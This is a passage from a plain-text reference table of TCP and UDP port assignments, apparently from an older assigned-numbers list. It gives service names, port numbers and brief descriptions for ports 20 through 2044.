  1863. ftp-data         20/tcp    File Transfer [Default Data]
  1864. ftp-data         20/udp    File Transfer [Default Data]
  1865. ftp              21/tcp    File Transfer [Control]
  1866. ftp              21/udp    File Transfer [Control]
  1867.                  22/tcp    Unassigned
  1868.                  22/udp    Unassigned
  1869. telnet           23/tcp    Telnet
  1870. telnet           23/udp    Telnet
  1871.                  24/tcp    any private mail system
  1872.                  24/udp    any private mail system
  1873. smtp             25/tcp    Simple Mail Transfer
  1874. smtp             25/udp    Simple Mail Transfer
  1875.                  26/tcp    Unassigned
  1876.                  26/udp    Unassigned
  1877. nsw-fe           27/tcp    NSW User System FE
  1878. nsw-fe           27/udp    NSW User System FE
  1879.                  28/tcp    Unassigned
  1880.                  28/udp    Unassigned
  1881. msg-icp          29/tcp    MSG ICP
  1882. msg-icp          29/udp    MSG ICP
  1883.                  30/tcp    Unassigned
  1884.                  30/udp    Unassigned
  1885. msg-auth         31/tcp    MSG Authentication
  1886. msg-auth         31/udp    MSG Authentication
  1887.                  32/tcp    Unassigned
  1888.                  32/udp    Unassigned
  1889. dsp              33/tcp    Display Support Protocol
  1890. dsp              33/udp    Display Support Protocol
  1891.                  34/tcp    Unassigned
  1892.                  34/udp    Unassigned
  1893.                  35/tcp    any private printer server
  1894.                  35/udp    any private printer server
  1895.                  36/tcp    Unassigned
  1896.                  36/udp    Unassigned
  1897. time             37/tcp    Time
  1898. time             37/udp    Time
  1899.                  38/tcp    Unassigned
  1900.                  38/udp    Unassigned
  1901. rlp              39/tcp    Resource Location Protocol
  1902. rlp              39/udp    Resource Location Protocol
  1903.                  40/tcp    Unassigned
  1904.                  40/udp    Unassigned
  1905. graphics         41/tcp    Graphics
  1906. graphics         41/udp    Graphics
  1907. nameserver       42/tcp    Host Name Server
  1908. nameserver       42/udp    Host Name Server
  1909. nicname          43/tcp    Who Is
  1910. nicname          43/udp    Who Is
  1911. mpm-flags        44/tcp    MPM FLAGS Protocol
  1912. mpm-flags        44/udp    MPM FLAGS Protocol
  1913. mpm              45/tcp    Message Processing Module [recv]
  1914. mpm              45/udp    Message Processing Module [recv]
  1915. mpm-snd          46/tcp    MPM [default send]
  1916. mpm-snd          46/udp    MPM [default send]
  1917. ni-ftp           47/tcp    NI FTP
  1918. ni-ftp           47/udp    NI FTP
  1919.                  48/tcp    Unassigned
  1920.                  48/udp    Unassigned
  1921. login            49/tcp    Login Host Protocol
  1922. login            49/udp    Login Host Protocol
  1923. re-mail-ck       50/tcp    Remote Mail Checking Protocol
  1924. re-mail-ck       50/udp    Remote Mail Checking Protocol
  1925. la-maint         51/tcp    IMP Logical Address Maintenance
  1926. la-maint         51/udp    IMP Logical Address Maintenance
  1927. xns-time         52/tcp    XNS Time Protocol
  1928. xns-time         52/udp    XNS Time Protocol
  1929. domain           53/tcp    Domain Name Server
  1930. domain           53/udp    Domain Name Server
  1931. xns-ch           54/tcp    XNS Clearinghouse
  1932. xns-ch           54/udp    XNS Clearinghouse
  1933. isi-gl           55/tcp    ISI Graphics Language
  1934. isi-gl           55/udp    ISI Graphics Language
  1935. xns-auth         56/tcp    XNS Authentication
  1936. xns-auth         56/udp    XNS Authentication
  1937.                  57/tcp    any private terminal access
  1938.                  57/udp    any private terminal access
  1939. xns-mail         58/tcp    XNS Mail
  1940. xns-mail         58/udp    XNS Mail
  1941.                  59/tcp    any private file service
  1942.                  59/udp    any private file service
  1943.                  60/tcp    Unassigned
  1944.                  60/udp    Unassigned
  1945. ni-mail          61/tcp    NI MAIL
  1946. ni-mail          61/udp    NI MAIL
  1947. acas             62/tcp    ACA Services
  1948. acas             62/udp    ACA Services
  1949. via-ftp          63/tcp    VIA Systems - FTP
  1950. via-ftp          63/udp    VIA Systems - FTP
  1951. covia            64/tcp    Communications Integrator (CI)
  1952. covia            64/udp    Communications Integrator (CI)
  1953. tacacs-ds        65/tcp    TACACS-Database Service
  1954. tacacs-ds        65/udp    TACACS-Database Service
  1955. sql*net          66/tcp    Oracle SQL*NET
  1956. sql*net          66/udp    Oracle SQL*NET
  1957. bootps           67/tcp    Bootstrap Protocol Server
  1958. bootps           67/udp    Bootstrap Protocol Server
  1959. bootpc           68/tcp    Bootstrap Protocol Client
  1960. bootpc           68/udp    Bootstrap Protocol Client
  1961. tftp             69/tcp    Trivial File Transfer
  1962. tftp             69/udp    Trivial File Transfer
  1963. gopher           70/tcp    Gopher
  1964. gopher           70/udp    Gopher
  1965. netrjs-1         71/tcp    Remote Job Service
  1966. netrjs-1         71/udp    Remote Job Service
  1967. netrjs-2         72/tcp    Remote Job Service
  1968. netrjs-2         72/udp    Remote Job Service
  1969. netrjs-3         73/tcp    Remote Job Service
  1970. netrjs-3         73/udp    Remote Job Service
  1971. netrjs-4         74/tcp    Remote Job Service
  1972. netrjs-4         74/udp    Remote Job Service
  1973.                  75/tcp    any private dial out service
  1974.                  75/udp    any private dial out service
  1975.                  76/tcp    Unassigned
  1976.                  76/udp    Unassigned
  1977.                  77/tcp    any private RJE service
  1978.                  77/udp    any private RJE service
  1979. vettcp           78/tcp    vettcp
  1980. vettcp           78/udp    vettcp
  1981. finger           79/tcp    Finger
  1982. finger           79/udp    Finger
  1983. www              80/tcp    World Wide Web HTTP
  1984. www              80/udp    World Wide Web HTTP
  1985. hosts2-ns        81/tcp    HOSTS2 Name Server
  1986. hosts2-ns        81/udp    HOSTS2 Name Server
  1987. xfer             82/tcp    XFER Utility
  1988. xfer             82/udp    XFER Utility
  1989. mit-ml-dev       83/tcp    MIT ML Device
  1990. mit-ml-dev       83/udp    MIT ML Device
  1991. ctf              84/tcp    Common Trace Facility
  1992. ctf              84/udp    Common Trace Facility
  1993. mit-ml-dev       85/tcp    MIT ML Device
  1994. mit-ml-dev       85/udp    MIT ML Device
  1995. mfcobol          86/tcp    Micro Focus Cobol
  1996. mfcobol          86/udp    Micro Focus Cobol
  1997.                  87/tcp    any private terminal link
  1998.                  87/udp    any private terminal link
  1999. kerberos         88/tcp    Kerberos
  2000. kerberos         88/udp    Kerberos
  2001. su-mit-tg        89/tcp    SU/MIT Telnet Gateway
  2002. su-mit-tg        89/udp    SU/MIT Telnet Gateway
  2003. dnsix            90/tcp    DNSIX Securit Attribute Token Map
  2004. dnsix            90/udp    DNSIX Securit Attribute Token Map
  2005. mit-dov          91/tcp    MIT Dover Spooler
  2006. mit-dov          91/udp    MIT Dover Spooler
  2007. npp              92/tcp    Network Printing Protocol
  2008. npp              92/udp    Network Printing Protocol
  2009. dcp              93/tcp    Device Control Protocol
  2010. dcp              93/udp    Device Control Protocol
  2011. objcall          94/tcp    Tivoli Object Dispatcher
  2012. objcall          94/udp    Tivoli Object Dispatcher
  2013. supdup           95/tcp    SUPDUP
  2014. supdup           95/udp    SUPDUP
  2015. dixie            96/tcp    DIXIE Protocol Specification
  2016. dixie            96/udp    DIXIE Protocol Specification
  2017. swift-rvf        97/tcp    Swift Remote Vitural File Protocol
  2018. swift-rvf        97/udp    Swift Remote Vitural File Protocol
  2019. tacnews          98/tcp    TAC News
  2020. tacnews          98/udp    TAC News
  2021. metagram         99/tcp    Metagram Relay
  2022. metagram         99/udp    Metagram Relay
  2023. newacct         100/tcp    [unauthorized use]
  2024. hostname        101/tcp    NIC Host Name Server
  2025. hostname        101/udp    NIC Host Name Server
  2026. iso-tsap        102/tcp    ISO-TSAP
  2027. iso-tsap        102/udp    ISO-TSAP
  2028. gppitnp         103/tcp    Genesis Point-to-Point Trans Net
  2029. gppitnp         103/udp    Genesis Point-to-Point Trans Net
  2030. acr-nema        104/tcp    ACR-NEMA Digital Imag. & Comm. 300
  2031. acr-nema        104/udp    ACR-NEMA Digital Imag. & Comm. 300
  2032. csnet-ns        105/tcp    Mailbox Name Nameserver
  2033. csnet-ns        105/udp    Mailbox Name Nameserver
  2034. 3com-tsmux      106/tcp    3COM-TSMUX
  2035. 3com-tsmux      106/udp    3COM-TSMUX
  2036. rtelnet         107/tcp    Remote Telnet Service
  2037. rtelnet         107/udp    Remote Telnet Service
  2038. snagas          108/tcp    SNA Gateway Access Server
  2039. snagas          108/udp    SNA Gateway Access Server
  2040. pop2            109/tcp    Post Office Protocol - Version 2
  2041. pop2            109/udp    Post Office Protocol - Version 2
  2042. pop3            110/tcp    Post Office Protocol - Version 3
  2043. pop3            110/udp    Post Office Protocol - Version 3
  2044. sunrpc          111/tcp    SUN Remote Procedure Call
  2045. sunrpc          111/udp    SUN Remote Procedure Call
  2046. mcidas          112/tcp    McIDAS Data Transmission Protocol
  2047. mcidas          112/udp    McIDAS Data Transmission Protocol
  2048. auth            113/tcp    Authentication Service
  2049. auth            113/udp    Authentication Service
  2050. audionews       114/tcp    Audio News Multicast
  2051. audionews       114/udp    Audio News Multicast
  2052. sftp            115/tcp    Simple File Transfer Protocol
  2053. sftp            115/udp    Simple File Transfer Protocol
  2054. ansanotify      116/tcp    ANSA REX Notify
  2055. ansanotify      116/udp    ANSA REX Notify
  2056. uucp-path       117/tcp    UUCP Path Service
  2057. uucp-path       117/udp    UUCP Path Service
  2058. sqlserv         118/tcp    SQL Services
  2059. sqlserv         118/udp    SQL Services
  2060. nntp            119/tcp    Network News Transfer Protocol
  2061. nntp            119/udp    Network News Transfer Protocol
  2062. cfdptkt         120/tcp    CFDPTKT
  2063. cfdptkt         120/udp    CFDPTKT
  2064. erpc            121/tcp    Encore Expedited Remote Pro.Call
  2065. erpc            121/udp    Encore Expedited Remote Pro.Call
  2066. smakynet        122/tcp    SMAKYNET
  2067. smakynet        122/udp    SMAKYNET
  2068. ntp             123/tcp    Network Time Protocol
  2069. ntp             123/udp    Network Time Protocol
  2070. ansatrader      124/tcp    ANSA REX Trader
  2071. ansatrader      124/udp    ANSA REX Trader
  2072. locus-map       125/tcp    Locus PC-Interface Net Map Ser
  2073. locus-map       125/udp    Locus PC-Interface Net Map Ser
  2074. unitary         126/tcp    Unisys Unitary Login
  2075. unitary         126/udp    Unisys Unitary Login
  2076. locus-con       127/tcp    Locus PC-Interface Conn Server
  2077. locus-con       127/udp    Locus PC-Interface Conn Server
  2078. gss-xlicen      128/tcp    GSS X License Verification
  2079. gss-xlicen      128/udp    GSS X License Verification
  2080. pwdgen          129/tcp    Password Generator Protocol
  2081. pwdgen          129/udp    Password Generator Protocol
  2082. cisco-fna       130/tcp    cisco FNATIVE
  2083. cisco-fna       130/udp    cisco FNATIVE
  2084. cisco-tna       131/tcp    cisco TNATIVE
  2085. cisco-tna       131/udp    cisco TNATIVE
  2086. cisco-sys       132/tcp    cisco SYSMAINT
  2087. cisco-sys       132/udp    cisco SYSMAINT
  2088. statsrv         133/tcp    Statistics Service
  2089. statsrv         133/udp    Statistics Service
  2090. ingres-net      134/tcp    INGRES-NET Service
  2091. ingres-net      134/udp    INGRES-NET Service
  2092. loc-srv         135/tcp    Location Service
  2093. loc-srv         135/udp    Location Service
  2094. profile         136/tcp    PROFILE Naming System
  2095. profile         136/udp    PROFILE Naming System
  2096. netbios-ns      137/tcp    NETBIOS Name Service
  2097. netbios-ns      137/udp    NETBIOS Name Service
  2098. netbios-dgm     138/tcp    NETBIOS Datagram Service
  2099. netbios-dgm     138/udp    NETBIOS Datagram Service
  2100. netbios-ssn     139/tcp    NETBIOS Session Service
  2101. netbios-ssn     139/udp    NETBIOS Session Service
  2102. emfis-data      140/tcp    EMFIS Data Service
  2103. emfis-data      140/udp    EMFIS Data Service
  2104. emfis-cntl      141/tcp    EMFIS Control Service
  2105. emfis-cntl      141/udp    EMFIS Control Service
  2106. bl-idm          142/tcp    Britton-Lee IDM
  2107. bl-idm          142/udp    Britton-Lee IDM
  2108. imap2           143/tcp    Interim Mail Access Protocol v2
  2109. imap2           143/udp    Interim Mail Access Protocol v2
  2110. news            144/tcp    NewS
  2111. news            144/udp    NewS
  2112. uaac            145/tcp    UAAC Protocol
  2113. uaac            145/udp    UAAC Protocol
  2114. iso-tp0         146/tcp    ISO-IP0
  2115. iso-tp0         146/udp    ISO-IP0
  2116. iso-ip          147/tcp    ISO-IP
  2117. iso-ip          147/udp    ISO-IP
  2118. cronus          148/tcp    CRONUS-SUPPORT
  2119. cronus          148/udp    CRONUS-SUPPORT
  2120. aed-512         149/tcp    AED 512 Emulation Service
  2121. aed-512         149/udp    AED 512 Emulation Service
  2122. sql-net         150/tcp    SQL-NET
  2123. sql-net         150/udp    SQL-NET
  2124. hems            151/tcp    HEMS
  2125. hems            151/udp    HEMS
  2126. bftp            152/tcp    Background File Transfer Program
  2127. bftp            152/udp    Background File Transfer Program
  2128. sgmp            153/tcp    SGMP
  2129. sgmp            153/udp    SGMP
  2130. netsc-prod      154/tcp    NETSC
  2131. netsc-prod      154/udp    NETSC
  2132. netsc-dev       155/tcp    NETSC
  2133. netsc-dev       155/udp    NETSC
  2134. sqlsrv          156/tcp    SQL Service
  2135. sqlsrv          156/udp    SQL Service
  2136. knet-cmp        157/tcp    KNET/VM Command/Message Protocol
  2137. knet-cmp        157/udp    KNET/VM Command/Message Protocol
  2138. pcmail-srv      158/tcp    PCMail Server
  2139. pcmail-srv      158/udp    PCMail Server
  2140. nss-routing     159/tcp   NSS-Routing
  2141. nss-routing     159/udp   NSS-Routing
  2142. sgmp-traps      160/tcp    SGMP-TRAPS
  2143. sgmp-traps      160/udp    SGMP-TRAPS
  2144. snmp            161/tcp    SNMP
  2145. snmp            161/udp    SNMP
  2146. snmptrap        162/tcp    SNMPTRAP
  2147. snmptrap        162/udp    SNMPTRAP
  2148. cmip-man        163/tcp    CMIP/TCP Manager
  2149. cmip-man        163/udp    CMIP/TCP Manager
  2150. cmip-agent      164/tcp    CMIP/TCP Agent
  2151. smip-agent      164/udp    CMIP/TCP Agent
  2152. xns-courier     165/tcp   Xerox
  2153. xns-courier     165/udp   Xerox
  2154. s-net           166/tcp    Sirius Systems
  2155. s-net           166/udp    Sirius Systems
  2156. namp            167/tcp    NAMP
  2157. namp            167/udp    NAMP
  2158. rsvd            168/tcp    RSVD
  2159. rsvd            168/udp    RSVD
  2160. send            169/tcp    SEND
  2161. send            169/udp    SEND
  2162. print-srv       170/tcp    Network PostScript
  2163. print-srv       170/udp    Network PostScript
  2164. multiplex       171/tcp    Network Innovations Multiplex
  2165. multiplex       171/udp    Network Innovations Multiplex
  2166. cl/1            172/tcp    Network Innovations CL/1
  2167. cl/1            172/udp    Network Innovations CL/1
  2168. xyplex-mux      173/tcp    Xyplex
  2169. xyplex-mux      173/udp    Xyplex
  2170. mailq           174/tcp    MAILQ
  2171. mailq           174/udp    MAILQ
  2172. vmnet           175/tcp    VMNET
  2173. vmnet           175/udp    VMNET
  2174. genrad-mux      176/tcp    GENRAD-MUX
  2175. genrad-mux      176/udp    GENRAD-MUX
  2176. xdmcp           177/tcp    X Display Manager Control Protocol
  2177. xdmcp           177/udp    X Display Manager Control Protocol
  2178. nextstep        178/tcp    NextStep Window Server
  2179. NextStep        178/udp    NextStep Window Server
  2180. bgp             179/tcp    Border Gateway Protocol
  2181. bgp             179/udp    Border Gateway Protocol
  2182. ris             180/tcp    Intergraph
  2183. ris             180/udp    Intergraph
  2184. unify           181/tcp    Unify
  2185. unify           181/udp    Unify
  2186. audit           182/tcp    Unisys Audit SITP
  2187. audit           182/udp    Unisys Audit SITP
  2188. ocbinder        183/tcp    OCBinder
  2189. ocbinder        183/udp    OCBinder
  2190. ocserver        184/tcp    OCServer
  2191. ocserver        184/udp    OCServer
  2192. remote-kis      185/tcp    Remote-KIS
  2193. remote-kis      185/udp    Remote-KIS
  2194. kis             186/tcp    KIS Protocol
  2195. kis             186/udp    KIS Protocol
  2196. aci             187/tcp    Application Communication Interface
  2197. aci             187/udp    Application Communication Interface
  2198. mumps           188/tcp    Plus Five's MUMPS
  2199. mumps           188/udp    Plus Five's MUMPS
  2200. qft             189/tcp    Queued File Transport
  2201. qft             189/udp    Queued File Transport
  2202. gacp            190/tcp    Gateway Access Control Protocol
  2203. cacp            190/udp    Gateway Access Control Protocol
  2204. prospero        191/tcp    Prospero
  2205. prospero        191/udp    Prospero
  2206. osu-nms         192/tcp    OSU Network Monitoring System
  2207. osu-nms         192/udp    OSU Network Monitoring System
  2208. srmp            193/tcp    Spider Remote Monitoring Protocol
  2209. srmp            193/udp    Spider Remote Monitoring Protocol
  2210. irc             194/tcp    Internet Relay Chat Protocol
  2211. irc             194/udp    Internet Relay Chat Protocol
  2212. dn6-nlm-aud     195/tcp    DNSIX Network Level Module Audit
  2213. dn6-nlm-aud     195/udp    DNSIX Network Level Module Audit
  2214. dn6-smm-red     196/tcp    DNSIX Session Mgt Module Audit Redir
  2215. dn6-smm-red     196/udp    DNSIX Session Mgt Module Audit Redir
  2216. dls             197/tcp    Directory Location Service
  2217. dls             197/udp    Directory Location Service
  2218. dls-mon         198/tcp    Directory Location Service Monitor
  2219. dls-mon         198/udp    Directory Location Service Monitor
  2220. smux            199/tcp    SMUX
  2221. smux            199/udp    SMUX
  2222. src             200/tcp    IBM System Resource Controller
  2223. src             200/udp    IBM System Resource Controller
  2224. at-rtmp         201/tcp    AppleTalk Routing Maintenance
  2225. at-rtmp         201/udp    AppleTalk Routing Maintenance
  2226. at-nbp          202/tcp    AppleTalk Name Binding
  2227. at-nbp          202/udp    AppleTalk Name Binding
  2228. at-3            203/tcp    AppleTalk Unused
  2229. at-3            203/udp    AppleTalk Unused
  2230. at-echo         204/tcp    AppleTalk Echo
  2231. at-echo         204/udp    AppleTalk Echo
  2232. at-5            205/tcp    AppleTalk Unused
  2233. at-5            205/udp    AppleTalk Unused
  2234. at-zis          206/tcp    AppleTalk Zone Information
  2235. at-zis          206/udp    AppleTalk Zone Information
  2236. at-7            207/tcp    AppleTalk Unused
  2237. at-7            207/udp    AppleTalk Unused
  2238. at-8            208/tcp    AppleTalk Unused
  2239. at-8            208/udp    AppleTalk Unused
  2240. tam             209/tcp    Trivial Authenticated Mail Protocol
  2241. tam             209/udp    Trivial Authenticated Mail Protocol
  2242. z39.50          210/tcp    ANSI Z39.50
  2243. z39.50          210/udp    ANSI Z39.50
  2244. 914c/g          211/tcp    Texas Instruments 914C/G Terminal
  2245. 914c/g          211/udp    Texas Instruments 914C/G Terminal
  2246. anet            212/tcp    ATEXSSTR
  2247. anet            212/udp    ATEXSSTR
  2248. ipx             213/tcp    IPX
  2249. ipx             213/udp    IPX
  2250. vmpwscs         214/tcp    VM PWSCS
  2251. vmpwscs         214/udp    VM PWSCS
  2252. softpc          215/tcp    Insignia Solutions
  2253. softpc          215/udp    Insignia Solutions
  2254. atls            216/tcp    Access Technology License Server
  2255. atls            216/udp    Access Technology License Server
  2256. dbase           217/tcp    dBASE Unix
  2257. dbase           217/udp    dBASE Unix
  2258. mpp             218/tcp    Netix Message Posting Protocol
  2259. mpp             218/udp    Netix Message Posting Protocol
  2260. uarps           219/tcp    Unisys ARPs
  2261. uarps           219/udp    Unisys ARPs
  2262. imap3           220/tcp    Interactive Mail Access Protocol v3
  2263. imap3           220/udp    Interactive Mail Access Protocol v3
  2264. fln-spx         221/tcp    Berkeley rlogind with SPX auth
  2265. fln-spx         221/udp    Berkeley rlogind with SPX auth
  2266. fsh-spx         222/tcp    Berkeley rshd with SPX auth
  2267. fsh-spx         222/udp    Berkeley rshd with SPX auth
  2268. cdc             223/tcp    Certificate Distribution Center
  2269. cdc             223/udp    Certificate Distribution Center
  2270.                 224-241    Reserved
  2271. sur-meas        243/tcp    Survey Measurement
  2272. sur-meas        243/udp    Survey Measurement
  2273. link            245/tcp    LINK
  2274. link            245/udp    LINK
  2275. dsp3270         246/tcp    Display Systems Protocol
  2276. dsp3270         246/udp    Display Systems Protocol
  2277.                 247-255    Reserved
  2278. pawserv         345/tcp    Perf Analysis Workbench
  2279. pawserv         345/udp    Perf Analysis Workbench
  2280. zserv           346/tcp    Zebra server
  2281. zserv           346/udp    Zebra server
  2282. fatserv         347/tcp    Fatmen Server
  2283. fatserv         347/udp    Fatmen Server
  2284. clearcase       371/tcp    Clearcase
  2285. clearcase       371/udp    Clearcase
  2286. ulistserv       372/tcp    Unix Listserv
  2287. ulistserv       372/udp    Unix Listserv
  2288. legent-1        373/tcp    Legent Corporation
  2289. legent-1        373/udp    Legent Corporation
  2290. legent-2        374/tcp    Legent Corporation
  2291. legent-2        374/udp    Legent Corporation
  2292. exec            512/tcp    remote process execution;
  2293.                            authentication performed using
  2294.                            passwords and UNIX login names
  2295. biff            512/udp    used by mail system to notify users
  2296.                            of new mail received; currently
  2297.                            receives messages only from
  2298.                            processes on the same machine
  2299. login           513/tcp    remote login a la telnet;
  2300.                            automatic authentication performed
  2301.                            based on priviledged port numbers
  2302.                            and distributed data bases which
  2303.                            identify "authentication domains"
  2304. who             513/udp    maintains data bases showing who's
  2305.                            logged in to machines on a local
  2306.                            net and the load average of the
  2307.                            machine
  2308. cmd             514/tcp    like exec, but automatic
  2309.                            authentication is performed as for
  2310.                            login server
  2311. syslog          514/udp
  2312. printer         515/tcp    spooler
  2313. printer         515/udp    spooler
  2314. talk            517/tcp    like tenex link, but across
  2315.                            machine - unfortunately, doesn't
  2316.                            use link protocol (this is actually
  2317.                            just a rendezvous port from which a
  2318.                            tcp connection is established)
  2319. talk            517/udp    like tenex link, but across
  2320.                            machine - unfortunately, doesn't
  2321.                            use link protocol (this is actually
  2322.                            just a rendezvous port from which a
  2323.                            tcp connection is established)
  2324. ntalk           518/tcp
  2325. ntalk           518/udp
  2326. utime           519/tcp    unixtime
  2327. utime           519/udp    unixtime
  2328. efs             520/tcp    extended file name server
  2329. router          520/udp    local routing process (on site);
  2330.                            uses variant of Xerox NS routing
  2331.                            information protocol
  2332. timed           525/tcp    timeserver
  2333. timed           525/udp    timeserver
  2334. tempo           526/tcp    newdate
  2335. tempo           526/udp    newdate
  2336. courier         530/tcp    rpc
  2337. courier         530/udp    rpc
  2338. conference      531/tcp    chat
  2339. conference      531/udp    chat
  2340. netnews         532/tcp    readnews
  2341. netnews         532/udp    readnews
  2342. netwall         533/tcp    for emergency broadcasts
  2343. netwall         533/udp    for emergency broadcasts
  2344. uucp            540/tcp    uucpd
  2345. uucp            540/udp    uucpd
  2346. klogin          543/tcp
  2347. klogin          543/udp
  2348. kshell          544/tcp    krcmd
  2349. kshell          544/udp    krcmd
  2350. new-rwho        550/tcp    new-who
  2351. new-rwho        550/udp    new-who
  2352. dsf             555/tcp
  2353. dsf             555/udp
  2354. remotefs        556/tcp    rfs server
  2355. remotefs        556/udp    rfs server
  2356. rmonitor        560/tcp    rmonitord
  2357. rmonitor        560/udp    rmonitord
  2358. monitor         561/tcp
  2359. monitor         561/udp
  2360. chshell         562/tcp    chcmd
  2361. chshell         562/udp    chcmd
  2362. 9pfs            564/tcp    plan 9 file service
  2363. 9pfs            564/udp    plan 9 file service
  2364. whoami          565/tcp    whoami
  2365. whoami          565/udp    whoami
  2366. meter           570/tcp    demon
  2367. meter           570/udp    demon
  2368. meter           571/tcp    udemon
  2369. meter           571/udp    udemon
  2370. ipcserver       600/tcp    Sun IPC server
  2371. ipcserver       600/udp    Sun IPC server
  2372. nqs             607/tcp    nqs
  2373. nqs             607/udp    nqs
  2374. mdqs            666/tcp
  2375. mdqs            666/udp
  2376. elcsd           704/tcp    errlog copy/server daemon
  2377. elcsd           704/udp    errlog copy/server daemon
  2378. netcp           740/tcp    NETscout Control Protocol
  2379. netcp           740/udp    NETscout Control Protocol
  2380. netgw           741/tcp    netGW
  2381. netgw           741/udp    netGW
  2382. netrcs          742/tcp    Network based Rev. Cont. Sys.
  2383. netrcs          742/udp    Network based Rev. Cont. Sys.
  2384. flexlm          744/tcp    Flexible License Manager
  2385. flexlm          744/udp    Flexible License Manager
  2386. fujitsu-dev     747/tcp    Fujitsu Device Control
  2387. fujitsu-dev     747/udp    Fujitsu Device Control
  2388. ris-cm          748/tcp    Russell Info Sci Calendar Manager
  2389. ris-cm          748/udp    Russell Info Sci Calendar Manager
  2390. kerberos-adm    749/tcp    kerberos administration
  2391. kerberos-adm    749/udp    kerberos administration
  2392. rfile           750/tcp
  2393. loadav          750/udp
  2394. pump            751/tcp
  2395. pump            751/udp
  2396. qrh             752/tcp
  2397. qrh             752/udp
  2398. rrh             753/tcp
  2399. rrh             753/udp
  2400. tell            754/tcp     send
  2401. tell            754/udp     send
  2402. nlogin          758/tcp
  2403. nlogin          758/udp
  2404. con             759/tcp
  2405. con             759/udp
  2406. ns              760/tcp
  2407. ns              760/udp
  2408. rxe             761/tcp
  2409. rxe             761/udp
  2410. quotad          762/tcp
  2411. quotad          762/udp
  2412. cycleserv       763/tcp
  2413. cycleserv       763/udp
  2414. omserv          764/tcp
  2415. omserv          764/udp
  2416. webster         765/tcp
  2417. webster         765/udp
  2418. phonebook       767/tcp    phone
  2419. phonebook       767/udp    phone
  2420. vid             769/tcp
  2421. vid             769/udp
  2422. cadlock         770/tcp
  2423. cadlock         770/udp
  2424. rtip            771/tcp
  2425. rtip            771/udp
  2426. cycleserv2      772/tcp
  2427. cycleserv2      772/udp
  2428. submit          773/tcp
  2429. notify          773/udp
  2430. rpasswd         774/tcp
  2431. acmaint_dbd     774/udp
  2432. entomb          775/tcp
  2433. acmaint_transd  775/udp
  2434. wpages          776/tcp
  2435. wpages          776/udp
  2436. wpgs            780/tcp
  2437. wpgs            780/udp
  2438. hp-collector    781/tcp        hp performance data collector
  2439. hp-collector    781/udp        hp performance data collector
  2440. hp-managed-node 782/tcp        hp performance data managed node
  2441. hp-managed-node 782/udp        hp performance data managed node
  2442. hp-alarm-mgr    783/tcp        hp performance data alarm manager
  2443. hp-alarm-mgr    783/udp        hp performance data alarm manager
  2444. mdbs_daemon     800/tcp
  2445. mdbs_daemon     800/udp
  2446. device          801/tcp
  2447. device          801/udp
  2448. xtreelic        996/tcp        XTREE License Server
  2449. xtreelic        996/udp        XTREE License Server
  2450. maitrd          997/tcp
  2451. maitrd          997/udp
  2452. busboy          998/tcp
  2453. puparp          998/udp
  2454. garcon          999/tcp
  2455. applix          999/udp        Applix ac
  2456. puprouter       999/tcp
  2457. puprouter       999/udp
  2458. cadlock         1000/tcp
  2459. ock             1000/udp
  2460. blackjack       1025/tcp   network blackjack
  2461. blackjack       1025/udp   network blackjack
  2462. hermes          1248/tcp
  2463. hermes          1248/udp
  2464. bbn-mmc         1347/tcp   multi media conferencing
  2465. bbn-mmc         1347/udp   multi media conferencing
  2466. bbn-mmx         1348/tcp   multi media conferencing
  2467. bbn-mmx         1348/udp   multi media conferencing
  2468. sbook           1349/tcp   Registration Network Protocol
  2469. sbook           1349/udp   Registration Network Protocol
  2470. editbench       1350/tcp   Registration Network Protocol
  2471. editbench       1350/udp   Registration Network Protocol
  2472. equationbuilder 1351/tcp   Digital Tool Works (MIT)
  2473. equationbuilder 1351/udp   Digital Tool Works (MIT)
  2474. lotusnote       1352/tcp   Lotus Note
  2475. lotusnote       1352/udp   Lotus Note
  2476. ingreslock      1524/tcp   ingres
  2477. ingreslock      1524/udp   ingres
  2478. orasrv          1525/tcp   oracle
  2479. orasrv          1525/udp   oracle
  2480. prospero-np     1525/tcp   prospero non-privileged
  2481. prospero-np     1525/udp   prospero non-privileged
  2482. tlisrv          1527/tcp   oracle
  2483. tlisrv          1527/udp   oracle
  2484. coauthor        1529/tcp   oracle
  2485. coauthor        1529/udp   oracle
  2486. issd            1600/tcp
  2487. issd            1600/udp
  2488. nkd             1650/tcp
  2489. nkd             1650/udp
  2490. callbook        2000/tcp
  2491. callbook        2000/udp
  2492. dc              2001/tcp
  2493. wizard          2001/udp    curry
  2494. globe           2002/tcp
  2495. globe           2002/udp
  2496. mailbox         2004/tcp
  2497. emce            2004/udp    CCWS mm conf
  2498. berknet         2005/tcp
  2499. oracle          2005/udp
  2500. invokator       2006/tcp
  2501. raid-cc         2006/udp    raid
  2502. dectalk         2007/tcp
  2503. raid-am         2007/udp
  2504. conf            2008/tcp
  2505. terminaldb      2008/udp
  2506. news            2009/tcp
  2507. whosockami      2009/udp
  2508. search          2010/tcp
  2509. pipe_server     2010/udp
  2510. raid-cc         2011/tcp    raid
  2511. servserv        2011/udp
  2512. ttyinfo         2012/tcp
  2513. raid-ac         2012/udp
  2514. raid-am         2013/tcp
  2515. raid-cd         2013/udp
  2516. troff           2014/tcp
  2517. raid-sf         2014/udp
  2518. cypress         2015/tcp
  2519. raid-cs         2015/udp
  2520. bootserver      2016/tcp
  2521. bootserver      2016/udp
  2522. cypress-stat    2017/tcp
  2523. bootclient      2017/udp
  2524. terminaldb      2018/tcp
  2525. rellpack        2018/udp
  2526. whosockami      2019/tcp
  2527. about           2019/udp
  2528. xinupageserver  2020/tcp
  2529. xinupageserver  2020/udp
  2530. servexec        2021/tcp
  2531. xinuexpansion1  2021/udp
  2532. down            2022/tcp
  2533. xinuexpansion2  2022/udp
  2534. xinuexpansion3  2023/tcp
  2535. xinuexpansion3  2023/udp
  2536. xinuexpansion4  2024/tcp
  2537. xinuexpansion4  2024/udp
  2538. ellpack         2025/tcp
  2539. xribs           2025/udp
  2540. scrabble        2026/tcp
  2541. scrabble        2026/udp
  2542. shadowserver    2027/tcp
  2543. shadowserver    2027/udp
  2544. submitserver    2028/tcp
  2545. submitserver    2028/udp
  2546. device2         2030/tcp
  2547. device2         2030/udp
  2548. blackboard      2032/tcp
  2549. blackboard      2032/udp
  2550. glogger         2033/tcp
  2551. glogger         2033/udp
  2552. scoremgr        2034/tcp
  2553. scoremgr        2034/udp
  2554. imsldoc         2035/tcp
  2555. imsldoc         2035/udp
  2556. objectmanager   2038/tcp
  2557. objectmanager   2038/udp
  2558. lam             2040/tcp
  2559. lam             2040/udp
  2560. interbase       2041/tcp
  2561. interbase       2041/udp
  2562. isis            2042/tcp
  2563. isis            2042/udp
  2564. isis-bcast      2043/tcp
  2565. isis-bcast      2043/udp
  2566. rimsl           2044/tcp
